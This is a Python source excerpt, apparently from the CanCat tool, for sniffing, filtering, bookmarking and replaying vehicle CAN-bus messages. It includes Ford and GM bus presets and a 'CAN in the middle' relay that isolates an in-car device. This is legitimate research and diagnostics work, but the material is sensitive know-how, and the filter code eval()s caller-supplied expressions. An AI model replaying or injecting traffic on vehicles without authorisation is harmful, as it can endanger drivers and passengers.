out = [x for x in self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters, pretty, tail, viewbits)]
return "\n".join(out)
    def _reprCanMsg(self, idx, ts, arbid, msg, comment=None):
        # subclass hook: format one message line; implementations may return
        # DONT_PRINT_THIS_MESSAGE to suppress it (see reprCanMsgsLines)
        return reprCanMsg(idx, ts, arbid, msg, comment=comment)
def printCanSessions(self, arbid_list=None, advfilters=[]):
'''
Split CAN messages into Arbitration ID's and prints entire
sessions for each CAN id.
Defaults to printing by least number of messages, including all IDs
Or... provide your own list of ArbIDs in whatever order you like
'''
if arbid_list == None:
arbids = self.getArbitrationIds()
else:
arbids = [arbdata for arbdata in self.getArbitrationIds() if arbdata[1] in arbid_list]
for datalen,arbid,msgs in arbids:
print(self.reprCanMsgs(arbids=[arbid], advfilters=advfilters))
cmd = input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, S)earchReplay, Q)uit: ").upper()
while len(cmd) and cmd != 'N':
if cmd == 'R':
self.CANreplay(arbids=[arbid], timing=TIMING_REAL)
elif cmd == 'F':
self.CANreplay(arbids=[arbid], timing=TIMING_FAST)
elif cmd == 'I':
self.CANreplay(arbids=[arbid], timing=TIMING_INTERACTIVE)
elif cmd == 'S':
self.CANreplay(arbids=[arbid], timing=TIMING_SEARCH)
elif cmd == 'Q':
return
cmd = input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, S)earchReplay, Q)uit: ").upper()
print
def printBookmarks(self):
'''
Print out the list of current Bookmarks and where they sit
'''
print(self.reprBookmarks())
def printAsciiStrings(self, minbytes=4, strict=True):
'''
Search through messages looking for ASCII strings
'''
for idx, ts, arbid, msg in self.genCanMsgs():
if hasAscii(msg, minbytes=minbytes, strict=strict):
print(reprCanMsg(idx, ts, arbid, msg, repr(msg)))
def reprBookmarks(self):
'''
get a string representation of the bookmarks
'''
out = []
for bid in range(len(self.bookmarks)):
out.append(self.reprBookmark(bid))
return '\n'.join(out)
def reprBookmark(self, bid):
'''
get a string representation of one bookmark
'''
msgidx = self.bookmarks[bid]
info = self.bookmark_info.get(bid)
comment = info.get('comment')
if comment == None:
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, info.get('name'))
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s \tcomment: %s" % (bid, msgidx, info.get('name'), info.get('comment'))
def setMaskAndFilter(self,
mask0=0,
mask1=0,
filter0=0,
filter1=0,
filter2=0,
filter3=0,
filter4=0,
filter5=0):
'''
Set the filters and masks. The mask determines which bits matter for the filter following the
below truth table:
_____________________________________________________________________________
| Mask Bit n | Filter Bit n | Arbitration ID bit n | Accept or Reject |
| 0 | X | X | Accept |
| 1 | 0 | 0 | Accept |
| 1 | 0 | 1 | Reject |
| 1 | 1 | 0 | Reject |
| 1 | 1 | 1 | Accept |
-----------------------------------------------------------------------------
There are two RX buffers. mask0 and filters 0 and 1 apply to buffer 0. mask1 and the other four filters
apply to buffer 1.
'''
msg = struct.pack('>IIIIIIII', mask0, mask1, filter0, filter1, filter2, filter3, filter4, filter5)
return self._send(CMD_SET_FILT_MASK, msg)
def clearMaskAndFilter(self):
'''
Clears all masks and filters
'''
msg = struct.pack('>IIIIIIII', 0, 0, 0, 0, 0, 0, 0, 0)
return self._send(CMD_SET_FILT_MASK, msg)
def _test_throughput(self):
    '''
    Use in conjunction with the M2_TEST_FW to test throughput.
    Connect one CanCat up to another M2 or Arduino DUE device running the M2_TEST_FW firmware
    and run this function to perform a throughput test. No other device should be connected
    to allow the test to run unimpeded by other CAN traffic.
    '''
    self.clearCanMsgs()
    # phase 1 trigger: standard-ID transmit; the test firmware then streams
    # traffic while we wait (prints 60/50/40 seconds remaining)
    self.CANxmit(0x0010, "TEST")
    for i in range(6, 3, -1):
        print("Time remaining: ", i*10, " seconds")
        time.sleep(10)
    # phase 2 trigger: extended-ID transmit (prints 30/20/10 seconds remaining)
    self.CANxmit(0x810, "TEST", extflag=True)
    for i in range(3, 0, -1):
        print("Time remaining: ", i*10, " seconds")
        time.sleep(10)
    # check 1: 11-bit IDs, 1-byte payloads (arbid 0x00); each payload should
    # be the previous value + 1, wrapping at 0xff
    out_of_order_count = 0
    msg_count = 0
    prev_val = 0xFF
    for foo in self.genCanMsgs(arbids=[0x00]):
        msg_count += 1
        prev_val += 1
        if prev_val > 0xff:
            prev_val = 0
        # NOTE(review): foo[3] is the message payload as produced by
        # genCanMsgs(); comparing it to the int prev_val only works if the
        # payload arrives as an int here -- confirm on Python 3 (the 8-byte
        # checks below index foo[3][0] instead)
        if prev_val != foo[3]:
            out_of_order_count += 1
            prev_val = foo[3]
    if (out_of_order_count > 0):
        print("ERROR: 11 bit IDs, 1 byte messages, ", out_of_order_count, " Messages received out of order")
    elif (msg_count != 181810):
        # expected message counts are fixed by the M2_TEST_FW firmware
        print("ERROR: Received ", msg_count, " out of expected 181810 message")
    else:
        print("PASS: 11 bit IDs, 1 byte messages")
    # check 2: 11-bit IDs, 8-byte payloads (arbid 0x01); first payload byte
    # carries the incrementing counter
    out_of_order_count = 0
    msg_count = 0
    prev_val = 0xFF
    for foo in self.genCanMsgs(arbids=[0x01]):
        msg_count += 1
        prev_val += 1
        if prev_val > 0xff:
            prev_val = 0
        if prev_val != foo[3][0]:
            out_of_order_count += 1
            prev_val = foo[3][0]
    if (out_of_order_count > 0):
        print("ERROR: 11 bit IDs, 8 byte messages, ", out_of_order_count, " Messages received out of order")
    elif (msg_count != 90090):
        print("ERROR: Received ", msg_count, " out of expected 90090 message")
    else:
        print("PASS: 11 bit IDs, 8 byte messages")
    # check 3: 29-bit IDs, 1-byte payloads (arbid 0x800)
    out_of_order_count = 0
    msg_count = 0
    prev_val = 0xFF
    for foo in self.genCanMsgs(arbids=[0x800]):
        msg_count += 1
        prev_val += 1
        if prev_val > 0xff:
            prev_val = 0
        if prev_val != foo[3]:
            out_of_order_count += 1
            prev_val = foo[3]
    if (out_of_order_count > 0):
        print("ERROR: 29 bit IDs, 1 byte messages, ", out_of_order_count, " Messages received out of order")
    elif (msg_count != 133330):
        print("ERROR: Received ", msg_count, " out of expected 133330 message")
    else:
        print("PASS: 29 bit IDs, 1 byte messages")
    # check 4: 29-bit IDs, 8-byte payloads (arbid 0x801)
    out_of_order_count = 0
    msg_count = 0
    prev_val = 0xFF
    for foo in self.genCanMsgs(arbids=[0x801]):
        msg_count += 1
        prev_val += 1
        if prev_val > 0xff:
            prev_val = 0
        if prev_val != foo[3][0]:
            out_of_order_count += 1
            prev_val = foo[3][0]
    if (out_of_order_count > 0):
        print("ERROR: 29 bit IDs, 8 byte messages, ", out_of_order_count, " Messages received out of order")
    elif (msg_count != 76330):
        print("ERROR: Received ", msg_count, " out of expected 76330 message")
    else:
        print("PASS: 29 bit IDs, 8 byte messages")
def _printCanRegs(self):
    # Debug aid: ask the firmware to dump its CAN controller registers.
    self._send(CMD_PRINT_CAN_REGS, "")
def _bytesHelper(self, msg):
    '''
    Normalize a string argument to bytes, working on both Python 2
    and Python 3 (string types detected via six).
    '''
    if not isinstance(msg, six.string_types):
        return msg
    if sys.version_info < (3, 0):
        return bytes(msg)
    # py3: preserve arbitrary byte values embedded in the str
    return bytes(msg, 'raw_unicode_escape')
def getAscii(msg, minbytes=3):
    '''
    Extract printable-ASCII substrings from msg.

    Returns a list of slices of msg (bytes in, bytes out), each a run of
    at least minbytes consecutive printable characters
    (0x20 <= byte < 0x7f).

    Fixes vs. the original: the docstring described a nonexistent
    "strict" parameter (that belongs to hasAscii()), and an unused
    ascii_match local has been removed. Behavior is unchanged.
    '''
    strings = []
    ascii_count = 0
    startidx = None
    for bidx in range(len(msg)):
        byte = msg[bidx]
        if 0x20 <= byte < 0x7f:
            # printable: remember where this run started
            if startidx is None:
                startidx = bidx
            ascii_count += 1
        else:
            # non printable char terminates the current run;
            # if we reached the magic threshold, package it
            if ascii_count >= minbytes:
                strings.append(msg[startidx:bidx])
            # reset counters
            ascii_count = 0
            startidx = None
    # in case we have a string all the way to the end
    if ascii_count >= minbytes:
        strings.append(msg[startidx:])
    return strings
def hasAscii(msg, minbytes=3, strict=False):
    '''
    Return 1 if msg contains a run of at least minbytes printable ASCII
    characters (0x20 <= byte < 0x7f), else 0.

    If strict, any non-printable byte anywhere in msg returns 0
    immediately -- even when a qualifying run was already found.
    '''
    ascii_match = 0
    ascii_count = 0
    for byte in msg:
        if 0x20 <= byte < 0x7f:
            ascii_count +=1
            if ascii_count >= minbytes:
                # threshold reached; remember it (non-strict mode never unsets)
                ascii_match = 1
        else:
            if strict:
                return 0
            # run broken: start counting again
            ascii_count = 0
    return ascii_match
def reprCanMsg(idx, ts, arbid, data, comment=None):
    #TODO: make some repr magic that spits out known ARBID's and other subdata
    '''
    Format one CAN message (index, timestamp, arbitration id, length,
    hex payload, optional comment) as a single fixed-width line.
    '''
    if comment is None:
        comment = ''
    hexdata = binascii.hexlify(data)
    return "%.8d %8.3f ID: %.3x, Len: %.2x, Data: %-18s\t%s" % (
        idx, ts, arbid, len(data), hexdata, comment)
class FordInterface(CanInterface):
    '''
    CanInterface preset for Ford vehicles: convenience helpers that
    select the baud rate of each Ford CAN bus.
    '''
    def setCanBaudHSCAN(self):
        # high-speed CAN: 500kbps
        self.setCanBaud(CAN_500KBPS)
    def setCanBaudMSCAN(self):
        # medium-speed CAN: 125kbps
        self.setCanBaud(CAN_125KBPS)
    def setCanBaudICAN(self):
        # I-CAN runs at the same 500kbps rate
        self.setCanBaud(CAN_500KBPS)
class GMInterface(CanInterface):
    '''
    CanInterface preset for GM vehicles.

    DLC port:
        SW-LS-CAN   - pin 1                 33kbps
        MS-CAN      - pins 3+ and 11-       95kbps
        DW-FT-CAN   - pins 1+ and 9-        <125kbps
        HS-CAN      - pins 6+ and 14-       500kbps
    '''
    def setCanBaudHSCAN(self):
        # high-speed CAN: 500kbps
        self.setCanBaud(CAN_500KBPS)
    def setCanBaudMSCAN(self):
        # medium-speed CAN: 95kbps
        self.setCanBaud(CAN_95KBPS)
    def setCanBaudLSCAN(self):
        # single-wire low-speed CAN: 33kbps
        self.setCanBaud(CAN_33KBPS)
class CanInTheMiddleInterface(CanInterface):
    def __init__(self, port=None, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None):
        '''
        CAN in the middle. Allows the user to determine what CAN messages are being
        sent by a device by isolating a device from the CAN network and using two
        Can shields on one Arduino to relay the CAN messages to each other.

        Device<----->Isolation CanCat<----->Arduino<----->Vehicle CanCat<----->Vehicle
                CAN                   SPI      |      SPI              CAN
                                               |
                                               | < Serial
                                               PC

        This solves the problem of not being able to determine which device is sending
        which CAN message, since CAN messages have no source information and all messages
        are broadcast.

        The Can shield connected to the device is referred to as the isolation CanCat.
        This CanCat should be modified so that the CS SPI pin is connected to D10, rather
        than the default of D9. This is accomplished by cutting a trace on the circuit
        board and bridging the CS pad to the D10 pad. Seeedstudio has instructions
        on their Wiki, but their shield differed slightly from my board. The CanCat
        connected to the vehicle is referred to as the vehicle CanCat and should be unmodified.

        NOTE: the default for `baud` is the module-level `baud` constant,
        captured at class-definition time.
        '''
        # isolation-side bookmark state, parallel to the base class's
        # bookmarks / bookmark_info
        self.bookmarks_iso = []
        self.bookmark_info_iso = {}
        CanInterface.__init__(self, port=port, baud=baud, verbose=verbose, cmdhandlers=cmdhandlers, comment=comment, load_filename=load_filename, orig_iface=orig_iface)
        # live (non-replay) sessions switch the firmware into CITM mode
        if load_filename is None:
            self.setCanMode(CMD_CAN_MODE_CITM)
def genCanMsgsIso(self, start=0, stop=None, arbids=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    CAN message generator for the isolation-side mailbox (CMD_ISO_RECV).

    Yields (idx, ts, arbid, data) tuples for messages with indexes in
    [start, stop] (stop is inclusive; None means through the end of the
    capture). If arbids is given, only messages whose arbitration id is
    in that list are yielded.

    Bug fix: the loop used xrange(), which does not exist on Python 3
    (this file otherwise uses Python 3 constructs such as print() and
    input()); range() is equivalent here.
    '''
    messages = self._messages.get(CMD_ISO_RECV, [])
    if stop is None:
        stop = len(messages)
    else:
        # the caller's stop index is inclusive
        stop = stop + 1
    for idx in range(start, stop):
        ts, msg = messages[idx]
        arbid, data = self._splitCanMsg(msg)
        if arbids is not None and arbid not in arbids:
            # allow filtering of arbids
            continue
        yield (idx, ts, arbid, data)
def getCanMsgCountIso(self):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Number of CAN messages captured on the isolation side this session.
    '''
    return len(self._messages.get(CMD_ISO_RECV, []))
def printSessionStatsByBookmarkIso(self, start=None, stop=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Print isolation-side session stats for the messages that fall
    between two bookmarks.
    '''
    stats = self.getSessionStatsByBookmarkIso(start, stop)
    print(stats)
def printSessionStatsIso(self, start=0, stop=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
    for the isolation-side capture between two message indexes (as they
    sit in the CMD_ISO_RECV mailbox).
    '''
    stats = self.getSessionStatsIso(start, stop)
    print(stats)
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
def getSessionStatsByBookmarkIso(self, start=None, stop=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Resolve two bookmark indexes to message indexes and return the
    isolation-side session stats between them. A missing start means
    the beginning of the capture; a missing stop means the end.
    '''
    start_msg = 0 if start is None else self.getMsgIndexFromBookmarkIso(start)
    if stop is None:
        stop_msg = self.getCanMsgCountIso()
    else:
        stop_msg = self.getMsgIndexFromBookmarkIso(stop)
    return self.getSessionStatsIso(start=start_msg, stop=stop_msg)
def getArbitrationIdsIso(self, start=0, stop=None, reverse=False):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Return a list of (message_count, arbid, [(ts, data), ...]) tuples
    for the isolation-side capture, sorted by message count.
    '''
    by_arbid = {}
    for _idx, ts, arbid, data in self.genCanMsgsIso(start, stop):
        by_arbid.setdefault(arbid, []).append((ts, data))
    arbid_list = [(len(msgs), arbid, msgs) for arbid, msgs in by_arbid.items()]
    arbid_list.sort(reverse=reverse)
    return arbid_list
def getSessionStatsIso(self, start=0, stop=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Build a per-arbid timing summary (message count plus mean / median /
    high / low inter-message time deltas) for the isolation-side capture
    between two message indexes, followed by overall totals.
    Returns the whole report as one string.
    '''
    out = []
    arbid_list = self.getArbitrationIdsIso(start=start, stop=stop, reverse=True)
    for datalen, arbid, msgs in arbid_list:
        last = 0
        high = 0
        low = 0xffffffff
        for ts, data in msgs:
            # the first message of an arbid has no previous timestamp
            if last == 0:
                last = ts
                continue
            # calculate the high and low
            delta = ts - last
            if delta > high:
                high = delta
            if delta < low:
                low = delta
            # track repeated values (rounded to nearest .001 sec)
            last = ts
        if datalen > 1:
            # mean: total elapsed time divided by the number of gaps
            mean = (msgs[-1][0] - msgs[0][0]) / (datalen-1)
            # NOTE(review): named "median" but computed as the midpoint of
            # the low/high extremes (a midrange), not a true median
            median = low + (high-low) / 2
        else:
            low = 0
            mean = 0
            median = mean
        out.append("id: 0x%x\tcount: %d\ttiming:: mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
                (arbid, datalen, mean, median, high, low))
    msg_count = self.getCanMsgCountIso()
    out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
    return '\n'.join(out)
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
    '''
    Save a named bookmark (with optional comment).
    This stores the message index number from the
    CMD_ISO_RECV mailbox.
    This also places a bookmark in the normal CAN message
    stream.
    DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
    '''
    mbox = self._messages.get(CMD_ISO_RECV)
    msg_index = len(mbox) if mbox is not None else 0
    bkmk_index = len(self.bookmarks_iso)
    self.bookmarks_iso.append(msg_index)
    # should this be msg_index? benefit either way?
    self.bookmark_info_iso[bkmk_index] = {'name': name, 'comment': comment}
    # mirror the bookmark into the normal CAN stream as well
    CanInterface.placeCanBookmark(self, name=name, comment=comment)
    return bkmk_index
def getMsgIndexFromBookmarkIso(self, bkmk_index):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    # Map an isolation-side bookmark index to the message index it marks.
    return self.bookmarks_iso[bkmk_index]
def getBookmarkFromMsgIndexIso(self, msg_index):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    # Reverse lookup: first bookmark placed at msg_index.
    # Raises ValueError if no bookmark marks that message.
    bkmk_index = self.bookmarks_iso.index(msg_index)
    return bkmk_index
def setCanBookmarkNameIso(self, bkmk_index, name):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Rename an isolation-side bookmark.

    Bug fix: bookmark info dicts use the literal keys 'name'/'comment'
    (see placeCanBookmark); the old code wrote info[name] = name, storing
    the new name under itself instead of updating the 'name' entry.
    '''
    info = self.bookmark_info_iso[bkmk_index]
    info['name'] = name
def setCanBookmarkCommentIso(self, bkmk_index, comment):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Set the comment on an isolation-side bookmark.

    Bug fix: the old code wrote info[name] = name, which both referenced
    an undefined variable (NameError) and never stored the comment; the
    info dicts use the literal 'comment' key (see placeCanBookmark).
    '''
    info = self.bookmark_info_iso[bkmk_index]
    info['comment'] = comment
def setCanBookmarkNameByMsgIndexIso(self, msg_index, name):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Rename the isolation-side bookmark that marks msg_index.

    Bug fix: writes the 'name' key of the info dict (see
    placeCanBookmark) instead of the old info[name] = name.
    '''
    bkmk_index = self.bookmarks_iso.index(msg_index)
    info = self.bookmark_info_iso[bkmk_index]
    info['name'] = name
def setCanBookmarkCommentByMsgIndexIso(self, msg_index, comment):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Set the comment on the isolation-side bookmark that marks msg_index.

    Bug fix: the old code wrote info[name] = name (undefined variable,
    comment discarded); the info dicts use the literal 'comment' key
    (see placeCanBookmark).
    '''
    bkmk_index = self.bookmarks_iso.index(msg_index)
    info = self.bookmark_info_iso[bkmk_index]
    info['comment'] = comment
def snapshotCanMessagesIso(self, name=None, comment=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Save bookmarks at the start and end of some event you are about to do
    Bookmarks are named "Start_" + name and "Stop_" + name
    DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
    '''
    # NOTE(review): placeCanBookmarkIso() is not defined anywhere in this
    # part of the file (only placeCanBookmark exists) -- confirm it exists
    # elsewhere, otherwise this raises AttributeError at runtime
    start_bkmk = self.placeCanBookmarkIso("Start_" + name, comment)
    input("Press Enter When Done...")
    stop_bkmk = self.placeCanBookmarkIso("Stop_" + name, comment)
def filterCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
                arbids=None, ignore=[], advfilters=[]):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Resolve bookmark indexes to message indexes and delegate to
    filterCanMsgsIso(). Missing bookmarks mean "from the start" /
    "through the end" of the capture.

    Bug fix: when stop_bkmk was None the old code assigned
    stop_bkmk = -1 and left stop_msg undefined, raising NameError at
    the delegation call; stop_msg is now set to None instead.
    (The mutable [] defaults are kept for interface compatibility; they
    are only read here.)
    '''
    if start_bkmk is not None:
        start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
    else:
        start_msg = 0
    if stop_bkmk is not None:
        stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
    else:
        stop_msg = None
    if start_baseline_bkmk is not None:
        start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
    else:
        start_baseline_msg = None
    if stop_baseline_bkmk is not None:
        stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
    else:
        stop_baseline_msg = None
    return self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def filterCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Iso means the second CAN bus (M2's and DUE_CAN models have two CAN interfaces)
    returns the received CAN messages between indexes "start_msg" and "stop_msg"
    but only messages to ID's that *do not* appear in the baseline indicated
    by "start_baseline_msg" and "stop_baseline_msg".
    for message indexes, you *will* want to look into the bookmarking subsystem!

    Bug fixes vs. the original:
    * iterates the isolation mailbox (genCanMsgsIso) rather than the
      normal one, matching this method's documented purpose
    * the genCanMsgs* generators yield 4-tuples; the baseline loop
      unpacked only 3 values and raised ValueError
    * arbids=None is no longer wrapped into [None], which used to
      filter out every message
    '''
    self.log("starting filtering messages...")
    if stop_baseline_msg is not None:
        self.log("ignoring arbids from baseline...")
        # collect the set of arbids seen during the baseline window
        filter_ids = {arbid for _idx, _ts, arbid, _data in
                      self.genCanMsgsIso(start_baseline_msg, stop_baseline_msg)}
    else:
        filter_ids = None
    self.log("filtering messages...")
    if arbids is not None and not isinstance(arbids, list):
        arbids = [arbids]
    for idx, ts, arbid, msg in self.genCanMsgsIso(start_msg, stop_msg, arbids=arbids):
        if not ((arbids is not None and arbid in arbids) or arbid not in ignore and (filter_ids is None or arbid not in filter_ids)):
            continue
        # advanced filters allow python code to be handed in. if any of the python
        # code snippits result in "False" or 0, skip this message
        # SECURITY NOTE: advfilters are eval()'d -- only pass trusted expressions
        skip = False
        for advf in advfilters:
            lcls = self._locals(idx, ts, arbid, msg)
            if not eval(advf, lcls):
                skip = True
        if skip:
            continue
        yield (idx, ts, arbid, msg)
def printCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
                arbids=None, ignore=[], advfilters=[]):
    '''
    deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
    '''
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    rendered = self.reprCanMsgsByBookmarkIso(
        start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk,
        arbids, ignore, advfilters)
    print(rendered)
def reprCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)

    Resolves bookmark indexes to message indexes and delegates to
    reprCanMsgsIso().

    Bug fix: when stop_bkmk was None the old code assigned
    stop_bkmk = -1 and left stop_msg undefined (NameError at the
    delegation call); stop_msg is now None, meaning "through the end".
    An unused `out` local was also removed.
    '''
    if start_bkmk is not None:
        start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
    else:
        start_msg = 0
    if stop_bkmk is not None:
        stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
    else:
        stop_msg = None
    if start_baseline_bkmk is not None:
        start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
    else:
        start_baseline_msg = None
    if stop_baseline_bkmk is not None:
        stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
    else:
        stop_baseline_msg = None
    return self.reprCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Print the isolation-side messages selected by reprCanMsgsIso().
    '''
    rendered = self.reprCanMsgsIso(
        start_msg, stop_msg, start_baseline_msg, stop_baseline_msg,
        arbids, ignore, advfilters)
    print(rendered)
def reprCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    String representation of a set of CAN Messages.
    These can be filtered by start and stop message indexes, as well as
    use a baseline (defined by start/stop message indexes),
    by a list of "desired" arbids as well as a list of
    ignored arbids
    Many functions wrap this one.

    Annotates each line with REPEAT/Similar payload markers, embedded
    ASCII, and out-of-norm timestamp deltas, and interleaves bookmark
    lines at the message indexes where bookmarks were placed.
    '''
    out = []
    # announce when the window starts or ends exactly on a bookmark
    if start_msg in self.bookmarks_iso:
        bkmk = self.bookmarks_iso.index(start_msg)
        out.append("starting from bookmark %d: '%s'" %
                (bkmk,
                self.bookmark_info_iso[bkmk].get('name'))
                )
    if stop_msg in self.bookmarks_iso:
        bkmk = self.bookmarks_iso.index(stop_msg)
        out.append("stoppng at bookmark %d: '%s'" %
                (bkmk,
                self.bookmark_info_iso[bkmk].get('name'))
                )
    last_msg = None
    next_bkmk = 0
    next_bkmk_idx = 0
    msg_count = 0
    last_ts = None
    tot_delta_ts = 0
    counted_msgs = 0    # used for calculating averages, excluding outliers
    data_delta = None
    data_repeat = 0
    data_similar = 0
    for idx, ts, arbid, msg in self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters):
        diff = []
        # insert bookmark names/comments in appropriate places
        while next_bkmk_idx < len(self.bookmarks_iso) and idx >= self.bookmarks_iso[next_bkmk_idx]:
            out.append(self.reprBookmarkIso(next_bkmk_idx))
            next_bkmk_idx += 1
        msg_count += 1
        # check data: count how many payload bytes changed vs the previous message
        byte_cnt_diff = 0
        if last_msg != None:
            if len(last_msg) == len(msg):
                for bidx in range(len(msg)):
                    if last_msg[bidx] != msg[bidx]:
                        byte_cnt_diff += 1
                if byte_cnt_diff == 0:
                    diff.append("REPEAT")
                    data_repeat += 1
                elif byte_cnt_diff <=4:
                    diff.append("Similar")
                    data_similar += 1
                # FIXME: make some better heuristic to identify "out of norm"
        # look for ASCII data (4+ consecutive bytes)
        if hasAscii(msg):
            diff.append("ASCII: %s" % repr(msg))
        # calculate timestamp delta and comment if out of whack
        if last_ts == None:
            last_ts = ts
        delta_ts = ts - last_ts
        if counted_msgs:
            avg_delta_ts = tot_delta_ts / counted_msgs
        else:
            avg_delta_ts = delta_ts
        # only fold "normal" deltas into the running average; flag the rest
        if abs(delta_ts - avg_delta_ts) <= delta_ts:
            tot_delta_ts += delta_ts
            counted_msgs += 1
        else:
            diff.append("TS_delta: %.3f" % delta_ts)
        out.append(reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff)))
        last_ts = ts
        last_msg = msg
    out.append("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
    return "\n".join(out)
def printCanSessionsIso(self, arbid_list=None, advfilters=[]):
    '''
    Split CAN messages into Arbitration ID's and prints entire
    sessions for each CAN id.
    Defaults to printing by least number of messages, including all IDs
    Or... provide your own list of ArbIDs in whatever order you like

    Bug fix: the final bare `print` was a Python 2 leftover -- on
    Python 3 it evaluates the function object and prints nothing;
    replaced with print() to actually emit the intended blank line.
    '''
    if arbid_list is None:
        arbids = self.getArbitrationIdsIso()
    else:
        # getArbitrationIdsIso() yields (count, arbid, msgs); keep requested ids
        arbids = [arbdata for arbdata in self.getArbitrationIdsIso() if arbdata[1] in arbid_list]
    for datalen, arbid, msgs in arbids:
        print(self.reprCanMsgsIso(arbids=[arbid], advfilters=advfilters))
        input("\nPress Enter to review the next Session...")
        print()
def printBookmarksIso(self):
    '''
    Display every isolation-side bookmark, one per line.
    '''
    rendered = self.reprBookmarksIso()
    print(rendered)
def printAsciiStringsIso(self, minbytes=4, strict=True):
    '''
    Search through isolation-side messages looking for ASCII strings.

    Bug fix: the original called reprCanMsgIso(), which is not defined
    anywhere in this module (the module-level formatter is reprCanMsg,
    used identically by printAsciiStrings on the normal stream).
    '''
    for idx, ts, arbid, msg in self.genCanMsgsIso():
        if hasAscii(msg, minbytes=minbytes, strict=strict):
            print(reprCanMsg(idx, ts, arbid, msg, repr(msg)))
def reprBookmarksIso(self):
    '''
    Return all isolation-side bookmarks rendered as one
    newline-joined string.
    '''
    return '\n'.join(self.reprBookmarkIso(i) for i in range(len(self.bookmarks_iso)))
def reprBookmarkIso(self, bid):
    '''
    get a string representation of one isolation-side bookmark

    Bug fix: the original had no return statement for bookmarks that
    carry a comment, so it silently returned None for them; the
    comment-bearing form now mirrors reprBookmark().
    '''
    msgidx = self.bookmarks_iso[bid]
    info = self.bookmark_info_iso.get(bid)
    comment = info.get('comment')
    if comment is None:
        return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, info.get('name'))
    return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s \tcomment: %s" % (bid, msgidx, info.get('name'), comment)
def restoreSession(self, me, force=False):
    '''
    Load a previous analysis session from a python dictionary object
    see: saveSession()
    '''
    # refuse to clobber a live capture unless the caller forces it
    if isinstance(self._io, serial.Serial) and force==False:
        print("Refusing to reload a session while active session! use 'force=True' option")
        return
    self._messages = me.get('messages')
    self.bookmarks = me.get('bookmarks')
    self.bookmark_info = me.get('bookmark_info')
